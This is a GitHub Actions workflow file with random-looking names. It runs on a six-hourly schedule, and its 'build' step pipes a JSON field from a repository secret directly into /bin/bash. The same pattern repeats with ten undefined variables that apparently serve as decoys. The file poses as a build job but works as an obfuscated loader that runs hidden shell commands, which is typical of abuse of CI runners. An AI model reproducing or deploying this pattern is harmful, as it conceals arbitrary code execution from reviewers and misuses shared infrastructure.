name: xiaqimin3434

on:
  workflow_dispatch:
  schedule:
    - cron: '38 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaqimin3434
        env:
          acf226: ${{ secrets.acf226 }}
        run: |
          echo $acf226 | jq -r .buin890 | /bin/bash
          echo $uqxlc808 | jq -r .k394 | /bin/bash
          echo $tqua5 | jq -r .mkhp7 | /bin/bash
          echo $y7 | jq -r .wa2029 | /bin/bash
          echo $jtd4587 | jq -r .hyx12 | /bin/bash
          echo $zriej3 | jq -r .c0551 | /bin/bash
          echo $eigub0 | jq -r .naixs4 | /bin/bash
          echo $bci54 | jq -r .ujqqp55 | /bin/bash
          echo $sp89231 | jq -r .ckhf5 | /bin/bash
          echo $pnnz6 | jq -r .ikz24977 | /bin/bash
          echo $wcip7421 | jq -r .zx5 | /bin/bash

